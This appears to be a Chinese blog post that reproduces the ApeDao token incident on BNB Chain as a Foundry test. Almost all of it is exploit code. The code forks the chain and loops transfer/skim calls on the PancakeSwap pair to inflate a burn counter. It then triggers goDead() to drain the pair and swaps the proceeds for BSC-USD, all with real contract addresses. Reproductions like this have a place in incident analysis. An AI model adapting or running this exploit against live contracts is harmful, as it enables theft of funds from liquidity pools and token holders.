ApeDao事件代码复现
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
interface IAPEDAO is IERC20 {
function amountToDead() view external returns (uint256);
function goDead() external;
}
contract BNOTest is Test {
IAPEDAO apedao = IAPEDAO(0xB47955B5B7EAF49C815EBc389850eb576C460092);
IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
IPancakePair pancakePair = IPancakePair(payable(0xee2a9D05B943C1F33f3920C750Ac88F74D0220c3));
IERC20 bscusd = IERC20(0x55d398326f99059fF775485246999027B3197955);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 30072293);
cheats.label(address(apedao),"apedao");
}
function testExploit() public {
deal(address(apedao),address(this),2238674491718649997652);
emit log_named_decimal_uint("After deal attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
emit log_named_decimal_uint("Before attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
for(uint256 i=0;i<16;i++){
apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));
pancakePair.skim(address(this));
}
emit log_named_decimal_uint("After attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
emit log_named_decimal_uint("After attack attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
emit log_named_decimal_uint("Before godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
apedao.goDead();
emit log_named_decimal_uint("After godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
swap();
}
function swap() internal {
address[] memory path = new address[](2);
path[0] = address(apedao);
path[1] = address(bscusd);
uint256[] memory amounts = new uint256[](2);
amounts = pancakeRouter.getAmountsOut(apedao.balanceOf(address(this)),path);
apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));
pancakePair.swap(amounts[1]*90/100,0,address(this),"");
emit log_named_decimal_uint("After attack bscusd balance ", bscusd.balanceOf(address(this)) , bscusd.decimals());
}
}
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!